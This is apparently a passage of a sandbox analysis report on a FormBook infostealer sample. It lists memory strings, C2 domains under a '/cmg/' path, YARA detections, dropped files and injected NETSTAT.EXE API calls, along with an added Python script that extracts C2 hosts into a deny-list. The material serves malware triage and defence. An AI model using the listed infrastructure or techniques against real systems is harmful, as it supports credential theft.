            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmp, CN03716-2020.exe, 00000000.00000003.223755861.0000000005773000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/(
            Source: CN03716-2020.exe, 00000000.00000003.223755861.0000000005773000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/2-
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/=-
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/It
            Source: CN03716-2020.exe, 00000000.00000003.223920718.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y-
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/g-
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/h
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmp, CN03716-2020.exe, 00000000.00000003.223920718.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/2-
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/Y-
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ko
            Source: CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/n-
            Source: CN03716-2020.exe, 00000000.00000003.223920718.0000000005782000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/o-
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.kardus6.xyz
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.kardus6.xyz/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.kardus6.xyz/cmg/www.manderley-condos.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.kardus6.xyzReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.larvashop.net
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.larvashop.net/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.larvashop.net/cmg/www.8936199.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.larvashop.netReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.manderley-condos.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.manderley-condos.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.manderley-condos.com/cmg/www.rootforequality.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.manderley-condos.comReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.northminute.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.northminute.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.northminute.comReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.ravomail.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.ravomail.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.ravomail.com/cmg/www.xexpressx.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.ravomail.comReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp, NETSTAT.EXE, 0000000F.00000002.493362754.00000000034C9000.00000004.00000001.sdmpString found in binary or memory: http://www.rootforequality.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp, NETSTAT.EXE, 0000000F.00000002.493362754.00000000034C9000.00000004.00000001.sdmpString found in binary or memory: http://www.rootforequality.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.rootforequality.com/cmg/www.caneryis.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.rootforequality.comReferer:
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: CN03716-2020.exe, 00000000.00000003.224151658.00000000057AE000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.comX
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.shizukis2.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.shizukis2.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.shizukis2.com/cmg/www.dropofluxe.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.shizukis2.comReferer:
            Source: explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: CN03716-2020.exe, 00000000.00000003.221290771.000000000578B000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comn
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: CN03716-2020.exe, 00000000.00000003.225078344.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
            Source: CN03716-2020.exe, 00000000.00000003.225109607.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de.
            Source: CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: CN03716-2020.exe, 00000000.00000003.225109607.000000000577A000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dec
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.xexpressx.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.xexpressx.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.xexpressx.com/cmg/www.yumnamccann.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.xexpressx.comReferer:
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.yumnamccann.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.yumnamccann.com/cmg/
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.yumnamccann.com/cmg/www.1089konstanzter.com
            Source: explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmpString found in binary or memory: http://www.yumnamccann.comReferer:
            Source: CN03716-2020.exe, 00000000.00000003.223313528.0000000005788000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: NETSTAT.EXE, 0000000F.00000002.488134032.00000000008F2000.00000004.00000020.sdmpString found in binary or memory: https://login.live.ch
            Source: NETSTAT.EXE, 0000000F.00000002.488041727.00000000008D3000.00000004.00000020.sdmp, NETSTAT.EXE, 0000000F.00000003.392182290.00000000008F2000.00000004.00000001.sdmp, NETSTAT.EXE, 0000000F.00000003.392154725.00000000008E0000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: NETSTAT.EXE, 0000000F.00000003.392182290.00000000008F2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: NETSTAT.EXE, 0000000F.00000003.392182290.00000000008F2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
            Source: NETSTAT.EXE, 0000000F.00000002.486291049.0000000000398000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Gw
            Source: NETSTAT.EXE, 0000000F.00000002.488041727.00000000008D3000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: NETSTAT.EXE, 0000000F.00000002.488041727.00000000008D3000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033FcA
            Source: NETSTAT.EXE, 0000000F.00000003.392182290.00000000008F2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: NETSTAT.EXE, 0000000F.00000003.392182290.00000000008F2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033=
            Source: NETSTAT.EXE, 0000000F.00000002.488041727.00000000008D3000.00000004.00000020.sdmp, NETSTAT.EXE, 0000000F.00000003.392182290.00000000008F2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: NETSTAT.EXE, 0000000F.00000002.488041727.00000000008D3000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
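            Only the `/cmg/` URLs in the explorer.exe and NETSTAT.EXE dumps above belong to the sample's C2 domain list; the rest of the table is noise a triager has to discard (font-vendor sites of the kind stored in font name tables, which also show up in the pre-injection explorer.exe snapshot, and login.live.com OAuth strings in NETSTAT.EXE that fit the report's credential-harvesting signatures). The script below is an added example and is not part of the Joe Sandbox report or of the FormBook code; it expects finding lines in the "<process>, <dump>.sdmp: String found in binary or memory: <url>" form shown above, and `SAMPLE_FINDINGS` is a constructed subset of those lines.

```python
"""Pull FormBook C2 candidates out of 'String found in binary or memory' findings.

Added example, not part of the sandbox report. SAMPLE_FINDINGS is a constructed
subset of the report's lines; the '/cmg/' URI path is the one this sample uses.
"""
import re
from collections import defaultdict

SAMPLE_FINDINGS = """\
explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp: String found in binary or memory: http://www.iaimorganic.com/cmg/www.shizukis2.com
explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp: String found in binary or memory: http://www.iaimorganic.comReferer:
explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp: String found in binary or memory: http://www.kardus6.xyz/cmg/www.manderley-condos.com
explorer.exe, 00000005.00000002.503231558.0000000005900000.00000004.00000001.sdmp, NETSTAT.EXE, 0000000F.00000002.493362754.00000000034C9000.00000004.00000001.sdmp: String found in binary or memory: http://www.rootforequality.com/cmg/
CN03716-2020.exe, 00000000.00000002.250355463.0000000005860000.00000002.00000001.sdmp, explorer.exe, 00000005.00000000.276447578.000000000B150000.00000002.00000001.sdmp: String found in binary or memory: http://www.fontbureau.com/designers
CN03716-2020.exe, 00000000.00000003.224039350.0000000005782000.00000004.00000001.sdmp: String found in binary or memory: http://www.jiyu-kobo.co.jp/Y-
NETSTAT.EXE, 0000000F.00000002.488134032.00000000008F2000.00000004.00000020.sdmp: String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
"""

# Hostnames as they sit in the memory-resident list: lowercase, www-prefixed.
# Case-sensitive on purpose so that residue such as 'www.iaimorganic.comReferer:'
# is not swallowed into the TLD.
HOST_RE = re.compile(r"www\.[a-z0-9-]+(?:\.[a-z0-9-]+)+")
MARKER = "String found in binary or memory: "


def parse_finding(line):
    """Return (set of process names, url) for one finding line, or None if it is not one."""
    head, sep, url = line.partition(MARKER)
    if not sep:
        return None
    # The head alternates '<process>, <dump id>.sdmp'; keep only the process names.
    # rstrip also handles the fused '...sdmpString found' form of the raw page.
    procs = {tok.strip() for tok in head.rstrip(": ").split(",")
             if tok.strip() and not tok.strip().endswith(".sdmp")}
    return procs, url.strip()


def extract_c2_candidates(findings, c2_path="/cmg/"):
    """Map every hostname tied to the C2 URI path to the processes whose memory held it.

    Font-vendor metadata, OAuth residue and other noise never carry the path, so keying
    on it avoids a hand-maintained allow-list. A URL such as
    http://www.a.com/cmg/www.b.com is two adjacent list entries, so both hosts count.
    """
    hits = defaultdict(set)
    for line in findings.splitlines():
        parsed = parse_finding(line)
        if parsed is None:
            continue
        procs, url = parsed
        if c2_path not in url:
            continue
        for host in HOST_RE.findall(url):
            hits[host].update(procs)
    return {host: sorted(procs) for host, procs in sorted(hits.items())}


def as_blocklist(candidates):
    """One bare hostname per entry, 'www.' stripped, for a DNS or proxy deny-list."""
    return [host[4:] if host.startswith("www.") else host for host in candidates]


if __name__ == "__main__":
    found = extract_c2_candidates(SAMPLE_FINDINGS)
    for host, procs in found.items():
        print(f"{host:32} seen in {', '.join(procs)}")
    print("\n".join(as_blocklist(found)))
```

            Run against the full table above, the function returns only domains from the explorer.exe (00000005.00000002) and NETSTAT.EXE dumps, never from the loader process 0, which matches the report: the decoded configuration exists only in the injected hosts. FormBook's list mixes decoy domains with the live C2 and a string dump cannot tell them apart, so treat the whole set as IOCs rather than picking one.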

            E-Banking Fraud:

            Yara detected FormBook
            Source: Yara match | File source: 00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.487540678.0000000000840000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.297494662.00000000011A0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.246902905.0000000003729000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.296261500.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.487662133.0000000000870000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000F.00000002.486412389.00000000003D0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara match | File source: 3.2.CN03716-2020.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.CN03716-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE

            System Summary:

            Detected FormBook malware
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Dropped file: C:\Users\user\AppData\Roaming\0N65N-AB\0N6logri.ini
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Dropped file: C:\Users\user\AppData\Roaming\0N65N-AB\0N6logrv.ini
            Malicious sample detected (through community Yara rule)
            Source: 00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
            Source: 00000003.00000002.297656671.00000000014F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
            Source: 0000000F.00000002.487540678.0000000000840000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
            Source: 0000000F.00000002.487540678.0000000000840000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
            Source: 00000003.00000002.297494662.00000000011A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
            Source: 00000003.00000002.297494662.00000000011A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
            Source: 00000000.00000002.246902905.0000000003729000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
            Source: 00000000.00000002.246902905.0000000003729000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
            Source: 00000003.00000002.296261500.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
            Source: 00000003.00000002.296261500.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
            Source: 0000000F.00000002.487662133.0000000000870000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
            Source: 0000000F.00000002.487662133.0000000000870000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
            Source: 0000000F.00000002.486412389.00000000003D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
            Source: 0000000F.00000002.486412389.00000000003D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
            Source: 3.2.CN03716-2020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
            Source: 3.2.CN03716-2020.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
            Source: 3.2.CN03716-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
            Source: 3.2.CN03716-2020.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_00419CA0 NtCreateFile | 3_2_00419CA0
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_00419D50 NtReadFile | 3_2_00419D50
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_00419DD0 NtClose | 3_2_00419DD0
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_00419E80 NtAllocateVirtualMemory | 3_2_00419E80
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_00419C5A NtCreateFile | 3_2_00419C5A
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_00419CF2 NtCreateFile | 3_2_00419CF2
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_00419C9A NtCreateFile | 3_2_00419C9A
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_00419E7A NtAllocateVirtualMemory | 3_2_00419E7A
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9840 NtDelayExecution,LdrInitializeThunk | 15_2_00DC9840
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9860 NtQuerySystemInformation,LdrInitializeThunk | 15_2_00DC9860
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC95D0 NtClose,LdrInitializeThunk | 15_2_00DC95D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC99A0 NtCreateSection,LdrInitializeThunk | 15_2_00DC99A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9540 NtReadFile,LdrInitializeThunk | 15_2_00DC9540
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9560 NtWriteFile,LdrInitializeThunk | 15_2_00DC9560
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9910 NtAdjustPrivilegesToken,LdrInitializeThunk | 15_2_00DC9910
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC96D0 NtCreateKey,LdrInitializeThunk | 15_2_00DC96D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC96E0 NtFreeVirtualMemory,LdrInitializeThunk | 15_2_00DC96E0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9650 NtQueryValueKey,LdrInitializeThunk | 15_2_00DC9650
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9A50 NtCreateFile,LdrInitializeThunk | 15_2_00DC9A50
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9660 NtAllocateVirtualMemory,LdrInitializeThunk | 15_2_00DC9660
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9610 NtEnumerateValueKey,LdrInitializeThunk | 15_2_00DC9610
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9FE0 NtCreateMutant,LdrInitializeThunk | 15_2_00DC9FE0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9780 NtMapViewOfSection,LdrInitializeThunk | 15_2_00DC9780
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9770 NtSetInformationFile,LdrInitializeThunk | 15_2_00DC9770
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9710 NtQueryInformationToken,LdrInitializeThunk | 15_2_00DC9710
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9B00 NtSetValueKey,LdrInitializeThunk | 15_2_00DC9B00
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC98F0 NtReadVirtualMemory | 15_2_00DC98F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC98A0 NtWriteVirtualMemory | 15_2_00DC98A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DCB040 NtSuspendThread | 15_2_00DCB040
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9820 NtEnumerateKey | 15_2_00DC9820
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC99D0 NtCreateProcessEx | 15_2_00DC99D0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC95F0 NtQueryInformationFile | 15_2_00DC95F0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9950 NtQueueApcThread | 15_2_00DC9950
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DCAD30 NtSetContextThread | 15_2_00DCAD30
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9520 NtWaitForSingleObject | 15_2_00DC9520
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9A80 NtOpenDirectoryObject | 15_2_00DC9A80
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9670 NtQueryInformationProcess | 15_2_00DC9670
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9A10 NtQuerySection | 15_2_00DC9A10
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9A00 NtProtectVirtualMemory | 15_2_00DC9A00
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9A20 NtResumeThread | 15_2_00DC9A20
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DCA3B0 NtGetContextThread | 15_2_00DCA3B0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC97A0 NtUnmapViewOfSection | 15_2_00DC97A0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DCA770 NtOpenThread | 15_2_00DCA770
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9760 NtOpenProcess | 15_2_00DC9760
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DCA710 NtOpenProcessToken | 15_2_00DCA710
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00DC9730 NtQueryVirtualMemory | 15_2_00DC9730
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003E9CA0 NtCreateFile | 15_2_003E9CA0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003E9D50 NtReadFile | 15_2_003E9D50
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003E9DD0 NtClose | 15_2_003E9DD0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003E9E80 NtAllocateVirtualMemory | 15_2_003E9E80
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003E9C5A NtCreateFile | 15_2_003E9C5A
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003E9C9A NtCreateFile | 15_2_003E9C9A
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003E9CF2 NtCreateFile | 15_2_003E9CF2
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_003E9E7A NtAllocateVirtualMemory | 15_2_003E9E7A
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_00D79508 | 0_2_00D79508
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_00D7C1A8 | 0_2_00D7C1A8
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_00D7A7B8 | 0_2_00D7A7B8
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F27BD8 | 0_2_06F27BD8
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F20040 | 0_2_06F20040
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F20006 | 0_2_06F20006
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F26EB7 | 0_2_06F26EB7
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F26EB8 | 0_2_06F26EB8
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_06F29E98 | 0_2_06F29E98
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 0_2_070DC4E8 | 0_2_070DC4E8
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_00401030 | 3_2_00401030
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_0041D363 | 3_2_0041D363
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_00402D87 | 3_2_00402D87
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_00402D90 | 3_2_00402D90
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_00409E1B | 3_2_00409E1B
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_00409E20 | 3_2_00409E20
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_0041DED5 | 3_2_0041DED5
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_0041CEE6 | 3_2_0041CEE6
            Source: C:\Users\user\Desktop\CN03716-2020.exe | Code function: 3_2_00402FB0 | 3_2_00402FB0
            Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 15_2_00D9B090 | 15_2_00D9B090
